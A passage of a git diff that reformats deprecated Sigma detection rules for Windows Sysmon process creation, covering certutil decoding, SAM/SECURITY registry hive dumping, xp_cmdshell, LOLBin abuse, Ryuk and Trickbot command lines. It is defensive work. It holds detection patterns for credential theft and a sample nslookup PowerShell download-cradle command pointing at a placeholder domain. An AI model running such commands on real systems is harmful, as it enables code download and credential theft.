@@ -1,8 +1,7 @@ title: TA505 Dropper Load Pattern id: 18cf6cf0-39b0-4c22-9593-e244bdc9a2d4 status: deprecated -description: Detects mshta loaded by wmiprvse as parent as used by TA505 malicious - documents +description: Detects mshta loaded by wmiprvse as parent as used by TA505 malicious documents references: - https://twitter.com/ForensicITGuy/status/1334734244120309760 author: Florian Roth (Nextron Systems) @@ -23,8 +22,8 @@ detection: selection_parent: ParentImage|endswith: \wmiprvse.exe selection_mshta: - - Image|endswith: \mshta.exe - - OriginalFileName: mshta.exe + - Image|endswith: \mshta.exe + - OriginalFileName: mshta.exe condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/sysmon/deprecated/proc_creation_win_certutil_susp_execution.yml b/sigma/sysmon/deprecated/proc_creation_win_certutil_susp_execution.yml index 374031848..99b469a1f 100644 --- a/sigma/sysmon/deprecated/proc_creation_win_certutil_susp_execution.yml +++ b/sigma/sysmon/deprecated/proc_creation_win_certutil_susp_execution.yml @@ -1,8 +1,7 @@ title: Suspicious Certutil Command Usage id: e011a729-98a6-4139-b5c4-bf6f6dd8239a status: deprecated -description: Detects a suspicious Microsoft certutil execution with sub commands like - 'decode' sub command, which is sometimes used to decode malicious code +description: Detects a suspicious Microsoft certutil execution with sub commands like 'decode' sub command, which is sometimes used to decode malicious code references: - https://twitter.com/JohnLaTwC/status/835149808817991680 - https://blogs.technet.microsoft.com/pki/2006/11/30/basic-crl-checking-with-certutil/ 
@@ -33,10 +32,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \certutil.exe - - OriginalFileName: CertUtil.exe + - Image|endswith: \certutil.exe + - OriginalFileName: CertUtil.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - ' -decode ' - ' -decodehex ' - ' -urlcache ' @@ -54,7 +53,6 @@ fields: - CommandLine - ParentCommandLine falsepositives: - - False positives depend on scripts and administrative tools used in the monitored - environment + - False positives depend on scripts and administrative tools used in the monitored environment level: high ruletype: Sigma diff --git a/sigma/sysmon/deprecated/proc_creation_win_cmd_read_contents.yml b/sigma/sysmon/deprecated/proc_creation_win_cmd_read_contents.yml index a44772d39..4064e2984 100644 --- a/sigma/sysmon/deprecated/proc_creation_win_cmd_read_contents.yml +++ b/sigma/sysmon/deprecated/proc_creation_win_cmd_read_contents.yml @@ -19,17 +19,17 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_cmd: - - OriginalFileName: Cmd.Exe - - Image|endswith: \cmd.exe + - OriginalFileName: Cmd.Exe + - Image|endswith: \cmd.exe selection_read: - - ParentCommandLine|contains|all: - - cmd - - '/r ' - - < - - CommandLine|contains|all: - - cmd - - '/r ' - - < + - ParentCommandLine|contains|all: + - cmd + - '/r ' + - < + - CommandLine|contains|all: + - cmd + - '/r ' + - < condition: process_creation and (all of selection_*) falsepositives: - Legitimate use diff --git a/sigma/sysmon/deprecated/proc_creation_win_cmd_redirect_to_stream.yml b/sigma/sysmon/deprecated/proc_creation_win_cmd_redirect_to_stream.yml index 7c2e4dbf9..0a9825b39 100644 --- a/sigma/sysmon/deprecated/proc_creation_win_cmd_redirect_to_stream.yml +++ b/sigma/sysmon/deprecated/proc_creation_win_cmd_redirect_to_stream.yml 
@@ -1,8 +1,7 @@ title: Cmd Stream Redirection id: 70e68156-6571-427b-a6e9-4476a173a9b6 status: deprecated -description: Detects the redirection of an alternate data stream (ADS) of / within - a Windows command line session +description: Detects the redirection of an alternate data stream (ADS) of / within a Windows command line session references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.004/T1564.004.md#atomic-test-3---create-ads-command-prompt author: frack113 @@ -21,11 +20,11 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: \cmd.exe - CommandLine|contains|all: + CommandLine|contains|all: - '> ' - ':' filter: - CommandLine|contains: ' :\' + CommandLine|contains: ' :\' condition: process_creation and (selection and not filter) falsepositives: - Unknown diff --git a/sigma/sysmon/deprecated/proc_creation_win_credential_acquisition_registry_hive_dumping.yml b/sigma/sysmon/deprecated/proc_creation_win_credential_acquisition_registry_hive_dumping.yml index e4cdbf74c..c50ec5a81 100644 --- a/sigma/sysmon/deprecated/proc_creation_win_credential_acquisition_registry_hive_dumping.yml +++ b/sigma/sysmon/deprecated/proc_creation_win_credential_acquisition_registry_hive_dumping.yml @@ -19,14 +19,14 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_1: - - Image|endswith: \reg.exe - - OriginalFileName: reg.exe + - Image|endswith: \reg.exe + - OriginalFileName: reg.exe selection_2: - CommandLine|contains: + CommandLine|contains: - ' save ' - ' export ' selection_3: - CommandLine|contains: + CommandLine|contains: - hklm\sam - hklm\security - HKEY_LOCAL_MACHINE\SAM diff --git a/sigma/sysmon/deprecated/proc_creation_win_cscript_vbs.yml b/sigma/sysmon/deprecated/proc_creation_win_cscript_vbs.yml index 5751e6f82..f50fbcb8c 100644 --- a/sigma/sysmon/deprecated/proc_creation_win_cscript_vbs.yml 
+++ b/sigma/sysmon/deprecated/proc_creation_win_cscript_vbs.yml @@ -19,14 +19,14 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_exe: - - OriginalFileName: - - cscript.exe - - wscript.exe - - Image|endswith: - - \cscript.exe - - \wscript.exe + - OriginalFileName: + - cscript.exe + - wscript.exe + - Image|endswith: + - \cscript.exe + - \wscript.exe selection_script: - CommandLine|contains: .vbs + CommandLine|contains: .vbs condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/sysmon/deprecated/proc_creation_win_execution_mssql_xp_cmdshell_stored_procedure.yml b/sigma/sysmon/deprecated/proc_creation_win_execution_mssql_xp_cmdshell_stored_procedure.yml index ce66f3bfa..0f9276fb0 100644 --- a/sigma/sysmon/deprecated/proc_creation_win_execution_mssql_xp_cmdshell_stored_procedure.yml +++ b/sigma/sysmon/deprecated/proc_creation_win_execution_mssql_xp_cmdshell_stored_procedure.yml @@ -1,14 +1,12 @@ title: Execution via MSSQL Xp_cmdshell Stored Procedure id: 344482e4-a477-436c-aa70-7536d18a48c7 related: - - id: d08dd86f-681e-4a00-a92c-1db218754417 - type: derived - - id: 7f103213-a04e-4d59-8261-213dddf22314 - type: derived + - id: d08dd86f-681e-4a00-a92c-1db218754417 + type: derived + - id: 7f103213-a04e-4d59-8261-213dddf22314 + type: derived status: deprecated -description: Detects execution via MSSQL xp_cmdshell stored procedure. Malicious users - may attempt to elevate their privileges by using xp_cmdshell, which is disabled - by default. +description: Detects execution via MSSQL xp_cmdshell stored procedure. Malicious users may attempt to elevate their privileges by using xp_cmdshell, which is disabled by default. references: - https://www.elastic.co/guide/en/security/current/execution-via-mssql-xp_cmdshell-stored-procedure.html author: Tim Rauch 
@@ -26,8 +24,8 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \cmd.exe - - OriginalFileName: Cmd.Exe + - Image|endswith: \cmd.exe + - OriginalFileName: Cmd.Exe selection_parent: ParentImage|endswith: \sqlservr.exe condition: process_creation and (all of selection_*) diff --git a/sigma/sysmon/deprecated/proc_creation_win_indirect_cmd.yml b/sigma/sysmon/deprecated/proc_creation_win_indirect_cmd.yml index b69bc7093..a9ed2733f 100644 --- a/sigma/sysmon/deprecated/proc_creation_win_indirect_cmd.yml +++ b/sigma/sysmon/deprecated/proc_creation_win_indirect_cmd.yml @@ -1,8 +1,7 @@ title: Indirect Command Execution id: fa47597e-90e9-41cd-ab72-c3b74cfb0d02 status: deprecated -description: Detect indirect command execution via Program Compatibility Assistant - (pcalua.exe or forfiles.exe). +description: Detect indirect command execution via Program Compatibility Assistant (pcalua.exe or forfiles.exe). references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1202/T1202.md - https://eqllib.readthedocs.io/en/latest/analytics/884a7ccd-7305-4130-82d0-d4f90bc118b6.html @@ -31,8 +30,7 @@ fields: - ParentCommandLine - CommandLine falsepositives: - - Need to use extra processing with 'unique_count' / 'filter' to focus on outliers - as opposed to commonly seen artifacts. + - Need to use extra processing with 'unique_count' / 'filter' to focus on outliers as opposed to commonly seen artifacts. - Legitimate usage of scripts. level: low ruletype: Sigma diff --git a/sigma/sysmon/deprecated/proc_creation_win_indirect_command_execution_forfiles.yml b/sigma/sysmon/deprecated/proc_creation_win_indirect_command_execution_forfiles.yml index 2fec4c020..cab49d64c 100644 --- a/sigma/sysmon/deprecated/proc_creation_win_indirect_command_execution_forfiles.yml +++ b/sigma/sysmon/deprecated/proc_creation_win_indirect_command_execution_forfiles.yml 
@@ -1,16 +1,14 @@ title: Indirect Command Exectuion via Forfiles id: a85cf4e3-56ee-4e79-adeb-789f8fb209a8 related: - - id: fa47597e-90e9-41cd-ab72-c3b74cfb0d02 - type: obsoletes + - id: fa47597e-90e9-41cd-ab72-c3b74cfb0d02 + type: obsoletes status: deprecated -description: Detects execition of commands and binaries from the context of "forfiles.exe". - This can be used as a LOLBIN in order to bypass application whitelisting. +description: Detects execition of commands and binaries from the context of "forfiles.exe". This can be used as a LOLBIN in order to bypass application whitelisting. references: - https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-73d61931b2c77fde294189ce5d62323b416296a7c23ea98a608f425566538d1a - https://lolbas-project.github.io/lolbas/Binaries/Forfiles/ -author: Tim Rauch (rule), Elastic (idea), E.M. Anhaus (originally from Atomic Blue - Detections, Endgame), oscd.community +author: Tim Rauch (rule), Elastic (idea), E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community date: 2022/10/17 modified: 2023/01/04 tags: @@ -40,7 +38,7 @@ detection: - ' -m ' filter: Image|endswith: \cmd.exe - CommandLine|contains|all: + CommandLine|contains|all: - xcopy - cmd /c del condition: process_creation and (all of selection_* and not filter) diff --git a/sigma/sysmon/deprecated/proc_creation_win_invoke_obfuscation_via_rundll.yml b/sigma/sysmon/deprecated/proc_creation_win_invoke_obfuscation_via_rundll.yml index 97780489a..18c517882 100644 --- a/sigma/sysmon/deprecated/proc_creation_win_invoke_obfuscation_via_rundll.yml +++ b/sigma/sysmon/deprecated/proc_creation_win_invoke_obfuscation_via_rundll.yml 
@@ -3,7 +3,7 @@ id: 056a7ee1-4853-4e67-86a0-3fd9ceed7555 status: deprecated description: Detects Obfuscated Powershell via RUNDLL LAUNCHER references: - - https://github.com/SigmaHQ/sigma/issues/1009 + - https://github.com/SigmaHQ/sigma/issues/1009 #(Task 23) author: Timur Zinniatullin, oscd.community date: 2020/10/18 modified: 2023/02/21 @@ -21,7 +21,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains|all: + CommandLine|contains|all: - rundll32.exe - shell32.dll - shellexec_rundll diff --git a/sigma/sysmon/deprecated/proc_creation_win_invoke_obfuscation_via_use_rundll32.yml b/sigma/sysmon/deprecated/proc_creation_win_invoke_obfuscation_via_use_rundll32.yml index 6ac30c832..284f72b00 100644 --- a/sigma/sysmon/deprecated/proc_creation_win_invoke_obfuscation_via_use_rundll32.yml +++ b/sigma/sysmon/deprecated/proc_creation_win_invoke_obfuscation_via_use_rundll32.yml @@ -21,12 +21,12 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains|all: + CommandLine|contains|all: - '&&' - rundll32 - shell32.dll - shellexec_rundll - CommandLine|contains: + CommandLine|contains: - value - invoke - comspec diff --git a/sigma/sysmon/deprecated/proc_creation_win_lolbas_execution_of_wuauclt.yml b/sigma/sysmon/deprecated/proc_creation_win_lolbas_execution_of_wuauclt.yml index e7ab5ad25..6894ba389 100644 --- a/sigma/sysmon/deprecated/proc_creation_win_lolbas_execution_of_wuauclt.yml +++ b/sigma/sysmon/deprecated/proc_creation_win_lolbas_execution_of_wuauclt.yml 
@@ -1,8 +1,7 @@ title: Monitoring Wuauclt.exe For Lolbas Execution Of DLL id: ba1bb0cb-73da-42de-ad3a-de10c643a5d0 status: experimental -description: Adversaries can abuse wuauclt.exe (Windows Update client) to run code - execution by specifying an arbitrary DLL. +description: Adversaries can abuse wuauclt.exe (Windows Update client) to run code execution by specifying an arbitrary DLL. references: - https://dtm.uk/wuauclt/ author: Sreeman @@ -16,12 +15,12 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains|all: + CommandLine|contains|all: - wuauclt.exe - /UpdateDeploymentProvider - /Runhandlercomserver filter: - CommandLine|contains: + CommandLine|contains: - wuaueng.dll - UpdateDeploymentProvider.dll /ClassId condition: process_creation and (selection and not filter) diff --git a/sigma/sysmon/deprecated/proc_creation_win_lolbin_findstr.yml b/sigma/sysmon/deprecated/proc_creation_win_lolbin_findstr.yml index c863269e9..4ec1c05e3 100644 --- a/sigma/sysmon/deprecated/proc_creation_win_lolbin_findstr.yml +++ b/sigma/sysmon/deprecated/proc_creation_win_lolbin_findstr.yml @@ -1,8 +1,7 @@ title: Abusing Findstr for Defense Evasion id: bf6c39fc-e203-45b9-9538-05397c1b4f3f status: deprecated -description: Attackers can use findstr to hide their artifacts or search specific - strings and evade defense mechanism +description: Attackers can use findstr to hide their artifacts or search specific strings and evade defense mechanism references: - https://lolbas-project.github.io/lolbas/Binaries/Findstr/ - https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/ 
@@ -25,27 +24,26 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_findstr: - - CommandLine|contains: findstr - - Image|endswith: findstr.exe - - OriginalFileName: FINDSTR.EXE + - CommandLine|contains: findstr + - Image|endswith: findstr.exe + - OriginalFileName: FINDSTR.EXE selection_cli_download_1: - CommandLine|contains: + CommandLine|contains: - ' /v ' - ' -v ' selection_cli_download_2: - CommandLine|contains: + CommandLine|contains: - ' /l ' - ' -l ' selection_cli_creds_1: - CommandLine|contains: + CommandLine|contains: - ' /s ' - ' -s ' selection_cli_creds_2: - CommandLine|contains: + CommandLine|contains: - ' /i ' - ' -i ' - condition: process_creation and (selection_findstr and (all of selection_cli_download* - or all of selection_cli_creds*)) + condition: process_creation and (selection_findstr and (all of selection_cli_download* or all of selection_cli_creds*)) falsepositives: - Administrative findstr usage level: medium diff --git a/sigma/sysmon/deprecated/proc_creation_win_lolbin_office.yml b/sigma/sysmon/deprecated/proc_creation_win_lolbin_office.yml index b9950f903..d10c7cbba 100644 --- a/sigma/sysmon/deprecated/proc_creation_win_lolbin_office.yml +++ b/sigma/sysmon/deprecated/proc_creation_win_lolbin_office.yml @@ -1,8 +1,7 @@ title: Suspicious File Download Using Office Application id: 0c79148b-118e-472b-bdb7-9b57b444cc19 status: test -description: Detects the usage of one of three Microsoft office applications (Word, - Excel, PowerPoint) to download arbitrary files +description: Detects the usage of one of three Microsoft office applications (Word, Excel, PowerPoint) to download arbitrary files references: - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Powerpnt/ - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Excel/ 
@@ -27,7 +26,7 @@ detection: - \powerpnt.exe - \winword.exe - \excel.exe - CommandLine|contains: http + CommandLine|contains: http condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/sysmon/deprecated/proc_creation_win_lolbin_rdrleakdiag.yml b/sigma/sysmon/deprecated/proc_creation_win_lolbin_rdrleakdiag.yml index 937e6462a..062c1761a 100644 --- a/sigma/sysmon/deprecated/proc_creation_win_lolbin_rdrleakdiag.yml +++ b/sigma/sysmon/deprecated/proc_creation_win_lolbin_rdrleakdiag.yml @@ -21,9 +21,9 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection1: Image|endswith: \rdrleakdiag.exe - CommandLine|contains: /fullmemdmp + CommandLine|contains: /fullmemdmp selection2: - CommandLine|contains|all: + CommandLine|contains|all: - /fullmemdmp - ' /o ' - ' /p ' diff --git a/sigma/sysmon/deprecated/proc_creation_win_lolbins_by_office_applications.yml b/sigma/sysmon/deprecated/proc_creation_win_lolbins_by_office_applications.yml index 30c5de386..e99ad48ea 100644 --- a/sigma/sysmon/deprecated/proc_creation_win_lolbins_by_office_applications.yml +++ b/sigma/sysmon/deprecated/proc_creation_win_lolbins_by_office_applications.yml @@ -1,8 +1,7 @@ title: New Lolbin Process by Office Applications id: 23daeb52-e6eb-493c-8607-c4f0246cb7d8 status: deprecated -description: This rule will monitor any office apps that spins up a new LOLBin process. - This activity is pretty suspicious and should be investigated. +description: This rule will monitor any office apps that spins up a new LOLBin process. This activity is pretty suspicious and should be investigated. references: - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ - https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e 
@@ -10,8 +9,7 @@ references: - https://github.com/splunk/security_content/blob/develop/detections/endpoint/office_spawning_control.yml - https://twitter.com/andythevariable/status/1576953781581144064?s=20&t=QiJILvK4ZiBdR8RJe24u-A - https://www.elastic.co/security-labs/exploring-the-ref2731-intrusion-set -author: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Michael Haag, Christopher Peacock - @securepeacock (Update), SCYTHE @scythe_io (Update) +author: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Michael Haag, Christopher Peacock @securepeacock (Update), SCYTHE @scythe_io (Update) date: 2021/08/23 modified: 2023/02/04 tags: @@ -25,6 +23,7 @@ logsource: product: windows category: process_creation detection: + #useful_information: add more LOLBins to the rules logic of your choice. process_creation: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational diff --git a/sigma/sysmon/deprecated/proc_creation_win_mal_ryuk.yml b/sigma/sysmon/deprecated/proc_creation_win_mal_ryuk.yml index c3294165d..07c69aea0 100644 --- a/sigma/sysmon/deprecated/proc_creation_win_mal_ryuk.yml +++ b/sigma/sysmon/deprecated/proc_creation_win_mal_ryuk.yml @@ -1,8 +1,8 @@ title: Ryuk Ransomware Command Line Activity id: 0acaad27-9f02-4136-a243-c357202edd74 related: - - id: c37510b8-2107-4b78-aa32-72f251e7a844 - type: similar + - id: c37510b8-2107-4b78-aa32-72f251e7a844 + type: similar status: deprecated description: Detects Ryuk Ransomware command lines references: @@ -25,9 +25,9 @@ detection: Image|endswith: - \net.exe - \net1.exe - CommandLine|contains: stop + CommandLine|contains: stop selection2: - CommandLine|contains: + CommandLine|contains: - samss - audioendpointbuilder - unistoresvc_ diff --git a/sigma/sysmon/deprecated/proc_creation_win_malware_trickbot_recon_activity.yml b/sigma/sysmon/deprecated/proc_creation_win_malware_trickbot_recon_activity.yml index 7029d1345..b39fd23ac 100644 --- a/sigma/sysmon/deprecated/proc_creation_win_malware_trickbot_recon_activity.yml 
+++ b/sigma/sysmon/deprecated/proc_creation_win_malware_trickbot_recon_activity.yml @@ -1,12 +1,10 @@ title: Trickbot Malware Reconnaissance Activity id: 410ad193-a728-4107-bc79-4419789fcbf8 related: - - id: 5cc90652-4cbd-4241-aa3b-4b462fa5a248 - type: similar + - id: 5cc90652-4cbd-4241-aa3b-4b462fa5a248 + type: similar status: deprecated -description: Detects potential reconnaissance activity used by Trickbot malware. Trickbot - enumerates domain/network topology and executes certain commands automatically - every few minutes. +description: Detects potential reconnaissance activity used by Trickbot malware. Trickbot enumerates domain/network topology and executes certain commands automatically every few minutes. references: - https://www.sneakymonkey.net/2019/05/22/trickbot-analysis/ - https://app.any.run/tasks/f74c5157-8508-4ac6-9805-d63fe7b0d399/ @@ -27,7 +25,7 @@ detection: selection: ParentImage|endswith: \cmd.exe Image|endswith: \nltest.exe - CommandLine|contains: /domain_trusts /all_trusts + CommandLine|contains: /domain_trusts /all_trusts condition: process_creation and selection falsepositives: - Rare System Admin Activity diff --git a/sigma/sysmon/deprecated/proc_creation_win_mavinject_proc_inj.yml b/sigma/sysmon/deprecated/proc_creation_win_mavinject_proc_inj.yml index cf2a6e786..5dd61c3b8 100644 --- a/sigma/sysmon/deprecated/proc_creation_win_mavinject_proc_inj.yml +++ b/sigma/sysmon/deprecated/proc_creation_win_mavinject_proc_inj.yml @@ -21,7 +21,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: ' /INJECTRUNNING ' + CommandLine|contains: ' /INJECTRUNNING ' condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/sysmon/deprecated/proc_creation_win_msdt_diagcab.yml b/sigma/sysmon/deprecated/proc_creation_win_msdt_diagcab.yml index 233d1dc84..73886f33e 100644 --- a/sigma/sysmon/deprecated/proc_creation_win_msdt_diagcab.yml 
+++ b/sigma/sysmon/deprecated/proc_creation_win_msdt_diagcab.yml @@ -1,8 +1,7 @@ title: Execute MSDT.EXE Using Diagcab File id: 6545ce61-a1bd-4119-b9be-fcbee42c0cf3 status: deprecated -description: Detects diagcab leveraging the "ms-msdt" handler or the "msdt.exe" binary - to execute arbitrary commands as seen in CVE-2022-30190 +description: Detects diagcab leveraging the "ms-msdt" handler or the "msdt.exe" binary to execute arbitrary commands as seen in CVE-2022-30190 references: - https://github.com/GossiTheDog/ThreatHunting/blob/e85884abbf05d5b41efc809ea6532b10b45bd05c/AdvancedHuntingQueries/DogWalk-DiagCab - https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-9015912909545e72ed42cbac4d1e96295e8964579c406d23fd9c47a8091576a0 @@ -22,10 +21,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \msdt.exe - - OriginalFileName: msdt.exe + - Image|endswith: \msdt.exe + - OriginalFileName: msdt.exe selection_cmd: - CommandLine|contains: + CommandLine|contains: - ' /cab' - ' -cab' condition: process_creation and (all of selection_*) diff --git a/sigma/sysmon/deprecated/proc_creation_win_new_service_creation.yml b/sigma/sysmon/deprecated/proc_creation_win_new_service_creation.yml index 2248c657e..c70ee7f1e 100644 --- a/sigma/sysmon/deprecated/proc_creation_win_new_service_creation.yml +++ b/sigma/sysmon/deprecated/proc_creation_win_new_service_creation.yml @@ -21,11 +21,11 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection_sc: Image|endswith: \sc.exe - CommandLine|contains|all: + CommandLine|contains|all: - create - binPath selection_posh: - CommandLine|contains|all: + CommandLine|contains|all: - New-Service - -BinaryPathName condition: process_creation and (1 of selection*) 
diff --git a/sigma/sysmon/deprecated/proc_creation_win_nslookup_pwsh_download_cradle.yml b/sigma/sysmon/deprecated/proc_creation_win_nslookup_pwsh_download_cradle.yml index c32b51f80..3988145fe 100644 --- a/sigma/sysmon/deprecated/proc_creation_win_nslookup_pwsh_download_cradle.yml +++ b/sigma/sysmon/deprecated/proc_creation_win_nslookup_pwsh_download_cradle.yml @@ -1,13 +1,12 @@ title: Nslookup PwSh Download Cradle id: 72671447-4352-4413-bb91-b85569687135 status: deprecated -description: This rule tries to detect powershell download cradles, e.g. powershell - . (nslookup -q=txt http://some.owned.domain.com)[-1] +description: This rule tries to detect powershell download cradles, e.g. powershell . (nslookup -q=txt http://some.owned.domain.com)[-1] references: - https://twitter.com/alh4zr3d/status/1566489367232651264 author: Zach Mathis (@yamatosecurity) date: 2022/09/06 -modified: 2022/12/14 +modified: 2022/12/14 # Deprecation date tags: - attack.command_and_control - attack.t1105 @@ -23,7 +22,7 @@ detection: selection: ParentImage|endswith: \powershell.exe Image|contains: nslookup - CommandLine|contains: '=txt ' + CommandLine|contains: '=txt ' condition: process_creation and selection level: medium ruletype: Sigma diff --git a/sigma/sysmon/deprecated/proc_creation_win_odbcconf_susp_exec.yml b/sigma/sysmon/deprecated/proc_creation_win_odbcconf_susp_exec.yml index d2fdf2794..46e31a211 100644 --- a/sigma/sysmon/deprecated/proc_creation_win_odbcconf_susp_exec.yml +++ b/sigma/sysmon/deprecated/proc_creation_win_odbcconf_susp_exec.yml @@ -22,10 +22,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_1_img: - - Image|endswith: \odbcconf.exe - - OriginalFileName: odbcconf.exe + - Image|endswith: \odbcconf.exe + - OriginalFileName: odbcconf.exe selection_1_cli: - CommandLine|contains: + CommandLine|contains: - -a - -f - /a 
@@ -34,8 +34,8 @@ detection: selection_2_parent: ParentImage|endswith: \odbcconf.exe selection_2_img: - - Image|endswith: \rundll32.exe - - OriginalFileName: RUNDLL32.EXE + - Image|endswith: \rundll32.exe + - OriginalFileName: RUNDLL32.EXE condition: process_creation and (all of selection_1_* or all of selection_2_*) falsepositives: - Legitimate use of odbcconf.exe by legitimate user diff --git a/sigma/sysmon/deprecated/proc_creation_win_office_from_proxy_executing_regsvr32_payload.yml b/sigma/sysmon/deprecated/proc_creation_win_office_from_proxy_executing_regsvr32_payload.yml index 986b40e8b..93c3a472f 100644 --- a/sigma/sysmon/deprecated/proc_creation_win_office_from_proxy_executing_regsvr32_payload.yml +++ b/sigma/sysmon/deprecated/proc_creation_win_office_from_proxy_executing_regsvr32_payload.yml @@ -1,17 +1,11 @@ title: Excel Proxy Executing Regsvr32 With Payload id: 9d1c72f5-43f0-4da5-9320-648cf2099dd0 status: deprecated -description: 'Excel called wmic to finally proxy execute regsvr32 with the payload. - +description: | + Excel called wmic to finally proxy execute regsvr32 with the payload. An attacker wanted to break suspicious parent-child chain (Office app spawns LOLBin). - - But we have command-line in the event which allow us to "restore" this suspicious - parent-child chain and detect it. - - Monitor process creation with "wmic process call create" and LOLBins in command-line - with parent Office application processes. - - ' + But we have command-line in the event which allow us to "restore" this suspicious parent-child chain and detect it. + Monitor process creation with "wmic process call create" and LOLBins in command-line with parent Office application processes. references: - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml 
@@ -29,14 +23,15 @@ logsource: product: windows category: process_creation detection: + #useful_information: add more LOLBins to the rules logic of your choice. process_creation: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \wbem\WMIC.exe - - OriginalFileName: wmic.exe + - Image|endswith: \wbem\WMIC.exe + - OriginalFileName: wmic.exe selection_other: - CommandLine|contains: + CommandLine|contains: - regsvr32 - rundll32 - msiexec @@ -46,7 +41,7 @@ detection: - \winword.exe - \excel.exe - \powerpnt.exe - CommandLine|contains|all: + CommandLine|contains|all: - process - create - call diff --git a/sigma/sysmon/deprecated/proc_creation_win_office_from_proxy_executing_regsvr32_payload2.yml b/sigma/sysmon/deprecated/proc_creation_win_office_from_proxy_executing_regsvr32_payload2.yml index 77975fc7c..512f5d64c 100644 --- a/sigma/sysmon/deprecated/proc_creation_win_office_from_proxy_executing_regsvr32_payload2.yml +++ b/sigma/sysmon/deprecated/proc_creation_win_office_from_proxy_executing_regsvr32_payload2.yml 
@@ -1,17 +1,11 @@ title: Excel Proxy Executing Regsvr32 With Payload Alternate id: c0e1c3d5-4381-4f18-8145-2583f06a1fe5 status: deprecated -description: 'Excel called wmic to finally proxy execute regsvr32 with the payload. - +description: | + Excel called wmic to finally proxy execute regsvr32 with the payload. An attacker wanted to break suspicious parent-child chain (Office app spawns LOLBin). - - But we have command-line in the event which allow us to "restore" this suspicious - parent-child chain and detect it. - - Monitor process creation with "wmic process call create" and LOLBins in command-line - with parent Office application processes. - - ' + But we have command-line in the event which allow us to "restore" this suspicious parent-child chain and detect it. + Monitor process creation with "wmic process call create" and LOLBins in command-line with parent Office application processes. references: - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml @@ -29,26 +23,27 @@ logsource: product: windows category: process_creation detection: + #useful_information: add more LOLBins to the rules logic of your choice. process_creation: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection1: - CommandLine|contains: + CommandLine|contains: - regsvr32 - rundll32 - msiexec - mshta - verclsid selection2: - - Image|endswith: \wbem\WMIC.exe - - CommandLine|contains: 'wmic ' + - Image|endswith: \wbem\WMIC.exe + - CommandLine|contains: 'wmic ' selection3: ParentImage|endswith: - \winword.exe - \excel.exe - \powerpnt.exe selection4: - CommandLine|contains|all: + CommandLine|contains|all: - process - create - call 
diff --git a/sigma/sysmon/deprecated/proc_creation_win_office_spawning_wmi_commandline.yml b/sigma/sysmon/deprecated/proc_creation_win_office_spawning_wmi_commandline.yml index 557619043..512e6d8a9 100644 --- a/sigma/sysmon/deprecated/proc_creation_win_office_spawning_wmi_commandline.yml +++ b/sigma/sysmon/deprecated/proc_creation_win_office_spawning_wmi_commandline.yml @@ -1,8 +1,7 @@ title: Office Applications Spawning Wmi Cli Alternate id: 04f5363a-6bca-42ff-be70-0d28bf629ead status: deprecated -description: Initial execution of malicious document calls wmic to execute the file - with regsvr32 +description: Initial execution of malicious document calls wmic to execute the file with regsvr32 references: - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml @@ -20,12 +19,13 @@ logsource: product: windows category: process_creation detection: + #useful_information: Add more office applications to the rule logic of choice process_creation: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection1: - - Image|endswith: \wbem\WMIC.exe - - CommandLine|contains: 'wmic ' + - Image|endswith: 